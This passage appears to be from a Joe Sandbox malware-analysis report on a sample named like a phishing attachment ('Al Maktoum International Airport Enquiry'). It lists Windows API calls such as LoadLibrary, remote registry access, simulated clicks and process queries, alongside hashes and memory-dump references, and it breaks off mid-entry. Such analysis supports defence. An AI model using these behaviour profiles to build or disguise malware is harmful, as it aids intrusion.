            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
            • String ID:
            • API String ID: 3113390036-3916222277
            • Opcode ID: ddc0a41e1f8100c59f5dea57724eac0f61084ca4228d542b45ac24b90f4a501b
            • Instruction ID: f2262196b7e870b8039a7a7875fc5208ef8cfa03ff55b104eb7123194442f955
            • Opcode Fuzzy Hash: ddc0a41e1f8100c59f5dea57724eac0f61084ca4228d542b45ac24b90f4a501b
            • Instruction Fuzzy Hash: 5621BEB150020CFFEB619F21CC85EBB77ECEB89744F14012AFA05E2240EA209E0597B2
            APIs
              • Part of subcall function 00C81D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C81D73
              • Part of subcall function 00C81D35: GetStockObject.GDI32(00000011), ref: 00C81D87
              • Part of subcall function 00C81D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C81D91
            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00D066D0
            • LoadLibraryW.KERNEL32(?), ref: 00D066D7
            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00D066EC
            • DestroyWindow.USER32(?), ref: 00D066F4
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
            • String ID: SysAnimate32
            • API String ID: 4146253029-1011021900
            • Opcode ID: 61ababaebb795f20b217f521c2a77e7048addf8447d29b7c67cc952c2761550c
            • Instruction ID: 58996798a23ec2042b4168c98cc878ab46d69f1cdcccd62d00e6246469add7ed
            • Opcode Fuzzy Hash: 61ababaebb795f20b217f521c2a77e7048addf8447d29b7c67cc952c2761550c
            • Instruction Fuzzy Hash: 33218B71200206AFEF104F64EC80FAB37ADEB59368FA44629FA59D21E0D772CC619770
            APIs
            • GetStdHandle.KERNEL32(0000000C), ref: 00CE705E
            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CE7091
            • GetStdHandle.KERNEL32(0000000C), ref: 00CE70A3
            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00CE70DD
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CreateHandle$FilePipe
            • String ID: nul
            • API String ID: 4209266947-2873401336
            • Opcode ID: 4632f397794e1fbc1051efa5e38caa39ce14e141e2aeb25ce1cf9d0e9c3baca2
            • Instruction ID: 1f2b2e778f0c5a97941992ffe02155f1338a2232913acee67c39abf2f37ce799
            • Opcode Fuzzy Hash: 4632f397794e1fbc1051efa5e38caa39ce14e141e2aeb25ce1cf9d0e9c3baca2
            • Instruction Fuzzy Hash: 30215E74604349ABDF209F7ADC05B9A7BA8AF54720F204B19FCB5D72D0E7B09A509B60
            APIs
            • GetStdHandle.KERNEL32(000000F6), ref: 00CE712B
            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CE715D
            • GetStdHandle.KERNEL32(000000F6), ref: 00CE716E
            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00CE71A8
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CreateHandle$FilePipe
            • String ID: nul
            • API String ID: 4209266947-2873401336
            • Opcode ID: 8c7ee4cd0b81ab0efb0ef8146a16b637285c3e9d2eaef3b2c238285d20375edd
            • Instruction ID: cb9dc1244b7ea9da50a84787b529145a23a001fd872f72442659d955ac92c027
            • Opcode Fuzzy Hash: 8c7ee4cd0b81ab0efb0ef8146a16b637285c3e9d2eaef3b2c238285d20375edd
            • Instruction Fuzzy Hash: 0A21AF75604385ABDB209F6A9C04BAEB7A8AF55730F200B19FCF9D32D0D77099418B61
            APIs
            • SetErrorMode.KERNEL32(00000001), ref: 00CEAEBF
            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00CEAF13
            • __swprintf.LIBCMT ref: 00CEAF2C
            • SetErrorMode.KERNEL32(00000000,00000001,00000000,00D0F910), ref: 00CEAF6A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ErrorMode$InformationVolume__swprintf
            • String ID: %lu
            • API String ID: 3164766367-685833217
            • Opcode ID: 6593023c2e85845d7f7d3a201041d74445b891d7fbf8434a01eadfc88fefe147
            • Instruction ID: f571dc870142dc6222cc2642fa789d519ac218a205d07cf2a757aff7968daf32
            • Opcode Fuzzy Hash: 6593023c2e85845d7f7d3a201041d74445b891d7fbf8434a01eadfc88fefe147
            • Instruction Fuzzy Hash: 57217131A00249AFCB10EF65CC85EEE7BB8EF89704B144069F909EB351DB71EA45DB61
            APIs
              • Part of subcall function 00C87D2C: _memmove.LIBCMT ref: 00C87D66
              • Part of subcall function 00CDA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00CDA399
              • Part of subcall function 00CDA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CDA3AC
              • Part of subcall function 00CDA37C: GetCurrentThreadId.KERNEL32 ref: 00CDA3B3
              • Part of subcall function 00CDA37C: AttachThreadInput.USER32(00000000), ref: 00CDA3BA
            • GetFocus.USER32 ref: 00CDA554
              • Part of subcall function 00CDA3C5: GetParent.USER32(?), ref: 00CDA3D3
            • GetClassNameW.USER32(?,?,00000100), ref: 00CDA59D
            • EnumChildWindows.USER32(?,00CDA615), ref: 00CDA5C5
            • __swprintf.LIBCMT ref: 00CDA5DF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
            • String ID: %s%d
            • API String ID: 1941087503-1110647743
            • Opcode ID: 1d7332562cd0ffe09f49aae1aeb1b19e2a98d3f15518ba2f7aeb206110216881
            • Instruction ID: eaf2c21d25aed5db139002e9f437ebd22391e96d5f104510ab5036014f1eb0ef
            • Opcode Fuzzy Hash: 1d7332562cd0ffe09f49aae1aeb1b19e2a98d3f15518ba2f7aeb206110216881
            • Instruction Fuzzy Hash: D211B471200309BBDF217F64DC85FEA3779AF48700F14407ABA0CAA292DA7499469B75
            APIs
            • CharUpperBuffW.USER32(?,?), ref: 00CE2048
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: BuffCharUpper
            • String ID: APPEND$EXISTS$KEYS$REMOVE
            • API String ID: 3964851224-769500911
            • Opcode ID: 92caefb87a985cb506d72dadf35c3ebddb56f133e9bf3b299c65ef49eed3d769
            • Instruction ID: ce0776064a34d249c48239a4da7f9816074d948a12cc7223d449546eaa94972c
            • Opcode Fuzzy Hash: 92caefb87a985cb506d72dadf35c3ebddb56f133e9bf3b299c65ef49eed3d769
            • Instruction Fuzzy Hash: 4E115E7190020A8FCF00EFA5D8815FEB7B4FF56308F608469D855A7391EB325A06EB50
            APIs
            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00CFEF1B
            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00CFEF4B
            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00CFF07E
            • CloseHandle.KERNEL32(?), ref: 00CFF0FF
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Process$CloseCountersHandleInfoMemoryOpen
            • String ID:
            • API String ID: 2364364464-0
            • Opcode ID: 0dc927f0c7d72ebddd0b3337f31b528536657b50ca9f1e71b3e1b523a9877929
            • Instruction ID: 3711181badee5e5a947a51c64cbc0e9e312ccdcbc6c84eed1a0f2dbee6050182
            • Opcode Fuzzy Hash: 0dc927f0c7d72ebddd0b3337f31b528536657b50ca9f1e71b3e1b523a9877929
            • Instruction Fuzzy Hash: B28171716043009FD724EF24C886F6AB7E5EF48724F14882DF69ADB392DB70AD019B56
            APIs
              • Part of subcall function 00C87F41: _memmove.LIBCMT ref: 00C87F82
              • Part of subcall function 00D010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D00038,?,?), ref: 00D010BC
            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D00388
            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00D003C7
            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00D0040E
            • RegCloseKey.ADVAPI32(?,?), ref: 00D0043A
            • RegCloseKey.ADVAPI32(00000000), ref: 00D00447
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
            • String ID:
            • API String ID: 3440857362-0
            • Opcode ID: fbc6daca522fd21076f7b2dc263e6fa561000927646f007c6a3fe943b5b3c37f
            • Instruction ID: ecf5838a82d5ee2f67082e75d3cd551dcc17f0159114e50a4623bc09cd76100e
            • Opcode Fuzzy Hash: fbc6daca522fd21076f7b2dc263e6fa561000927646f007c6a3fe943b5b3c37f
            • Instruction Fuzzy Hash: 36515B31208204AFD714EF64C881F6EBBE8FF84708F54892DF59987291DB30E904DB66
            APIs
              • Part of subcall function 00C89997: __itow.LIBCMT ref: 00C899C2
              • Part of subcall function 00C89997: __swprintf.LIBCMT ref: 00C89A0C
            • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00CFDC3B
            • GetProcAddress.KERNEL32(00000000,?), ref: 00CFDCBE
            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00CFDCDA
            • GetProcAddress.KERNEL32(00000000,?), ref: 00CFDD1B
            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00CFDD35
              • Part of subcall function 00C85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00CE7B20,?,?,00000000), ref: 00C85B8C
              • Part of subcall function 00C85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00CE7B20,?,?,00000000,?,?), ref: 00C85BB0
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
            • String ID:
            • API String ID: 327935632-0
            • Opcode ID: 2d11f04f7de3e42e87b38830e1b32b0a705580e81ec46153da67a7ee1e75903f
            • Instruction ID: 1b92f018b04107340846c4a53d5734f7334dd9a14d075fb82d2ecf289416825c
            • Opcode Fuzzy Hash: 2d11f04f7de3e42e87b38830e1b32b0a705580e81ec46153da67a7ee1e75903f
            • Instruction Fuzzy Hash: BC512935A00209DFCB00EF68C4849ADB7F5FF59314B188069E91AAB351DB71EE45DF92
            APIs
            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00CEE88A
            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00CEE8B3
            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00CEE8F2
              • Part of subcall function 00C89997: __itow.LIBCMT ref: 00C899C2
              • Part of subcall function 00C89997: __swprintf.LIBCMT ref: 00C89A0C
            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00CEE917
            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00CEE91F
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
            • String ID:
            • API String ID: 1389676194-0
            • Opcode ID: 2074ec2ed4fbab0b59575ecbabe7b1fff286a59573e3030e85210ca768966e4f
            • Instruction ID: 70900c559c78c4e71cf4805e6b916f047adfe64633981dc44dfe83ca526b4d2b
            • Opcode Fuzzy Hash: 2074ec2ed4fbab0b59575ecbabe7b1fff286a59573e3030e85210ca768966e4f
            • Instruction Fuzzy Hash: F4514F35A00205DFCF15EF65C981AADBBF5FF08314B188099E849AB362CB31ED11DB54
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 6ccb751ae154091b5ba76271d83d628f24fdc3187ac00269f1418b9c53535eae
            • Instruction ID: b30f3c49ef1e60c45b74683bcc5133b1ac1274922d95aaf7db00be4cbbf439e9
            • Opcode Fuzzy Hash: 6ccb751ae154091b5ba76271d83d628f24fdc3187ac00269f1418b9c53535eae
            • Instruction Fuzzy Hash: 89419039900314ABD720DFACCC48FA9BBA4EB09310F594265E95EE72E1D770ED41DA72
            APIs
            • GetCursorPos.USER32(?), ref: 00C82357
            • ScreenToClient.USER32(00D467B0,?), ref: 00C82374
            • GetAsyncKeyState.USER32(00000001), ref: 00C82399
            • GetAsyncKeyState.USER32(00000002), ref: 00C823A7
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: AsyncState$ClientCursorScreen
            • String ID:
            • API String ID: 4210589936-0
            • Opcode ID: 9189bcd641a09085cff70d480de51e0393307899525352e491dddd6918cbe008
            • Instruction ID: 2d885c471523c7cda45561f0f8ea17b8ef61575a2fae8cf95a26751d7261a4d9
            • Opcode Fuzzy Hash: 9189bcd641a09085cff70d480de51e0393307899525352e491dddd6918cbe008
            • Instruction Fuzzy Hash: 16418275904215FBDF159F69C888AEDBB74FF05324F20431AF838922A0C735AE54DBA5
            APIs
            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CD695D
            • TranslateAcceleratorW.USER32(?,?,?), ref: 00CD69A9
            • TranslateMessage.USER32(?), ref: 00CD69D2
            • DispatchMessageW.USER32(?), ref: 00CD69DC
            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CD69EB
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Message$PeekTranslate$AcceleratorDispatch
            • String ID:
            • API String ID: 2108273632-0
            • Opcode ID: c5b452bc62abaa529f5bb35611628702212b74938b9a84f67fb26d045214c57a
            • Instruction ID: 02ae97eb9eedfbd3966d49913bd1d37bc5080c4ab599a8a150d18c91324243df
            • Opcode Fuzzy Hash: c5b452bc62abaa529f5bb35611628702212b74938b9a84f67fb26d045214c57a
            • Instruction Fuzzy Hash: 2D31E371900346ABDB20CF75CC84BBA7BA8AB03304F10416BE67AD37A1D775D989D7A1
            APIs
            • GetWindowRect.USER32(?,?), ref: 00CD8F12
            • PostMessageW.USER32(?,00000201,00000001), ref: 00CD8FBC
            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00CD8FC4
            • PostMessageW.USER32(?,00000202,00000000), ref: 00CD8FD2
            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00CD8FDA
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessagePostSleep$RectWindow
            • String ID:
            • API String ID: 3382505437-0
            • Opcode ID: c3f96cedfcb1990d6346ccf330c13e58ef36234205a738364e6ee73c93cff59c
            • Instruction ID: 8846dc7789e80d7ce61af5ae5dfc2ecbf6b60e261d7f1e46650011873f736f73
            • Opcode Fuzzy Hash: c3f96cedfcb1990d6346ccf330c13e58ef36234205a738364e6ee73c93cff59c
            • Instruction Fuzzy Hash: B831C271500219EFDF14CFA8DD4CBAE7BB6EB04315F10422AFA25E62D0C7B09A14DB91
            APIs
            • IsWindowVisible.USER32(?), ref: 00CDB6C7
            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00CDB6E4
            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00CDB71C
            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00CDB742
            • _wcsstr.LIBCMT ref: 00CDB74C
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
            • String ID:
            • API String ID: 3902887630-0
            • Opcode ID: 4de2a3b998160ed68995ee357fb789a7e780c3aa0e7791c53fe5d6257ed70ecc
            • Instruction ID: 5b65027053346607bcfcff7129c8c9f00d08f0e9f8169d04de1e7c13020c2ffa
            • Opcode Fuzzy Hash: 4de2a3b998160ed68995ee357fb789a7e780c3aa0e7791c53fe5d6257ed70ecc
            • Instruction Fuzzy Hash: FE210731204205FBEB255B399C49E7B7B98DF4A760F12402AFD09CA3A1EB61CD419270
            APIs
              • Part of subcall function 00C82612: GetWindowLongW.USER32(?,000000EB), ref: 00C82623
            • GetWindowLongW.USER32(?,000000F0), ref: 00D0B44C
            • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00D0B471
            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00D0B489
            • GetSystemMetrics.USER32(00000004), ref: 00D0B4B2
            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00CF1184,00000000), ref: 00D0B4D0
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$Long$MetricsSystem
            • String ID:
            • API String ID: 2294984445-0
            • Opcode ID: e22e707b8631a8560b80dfc6e56abdec9d26f281b9bb63177bf40238bf2420bd
            • Instruction ID: 78964444b85bb58bae4b6da2576b41c2a0ab51466a7c18dc389413a041c76e38
            • Opcode Fuzzy Hash: e22e707b8631a8560b80dfc6e56abdec9d26f281b9bb63177bf40238bf2420bd
            • Instruction Fuzzy Hash: 23218271914215AFCB209F38CC08B6937A4FB05738F254726F92AD36E1E730D910DB60
            APIs
            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CD9802
              • Part of subcall function 00C87D2C: _memmove.LIBCMT ref: 00C87D66
            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00CD9834
            • __itow.LIBCMT ref: 00CD984C
            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00CD9874
            • __itow.LIBCMT ref: 00CD9885
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
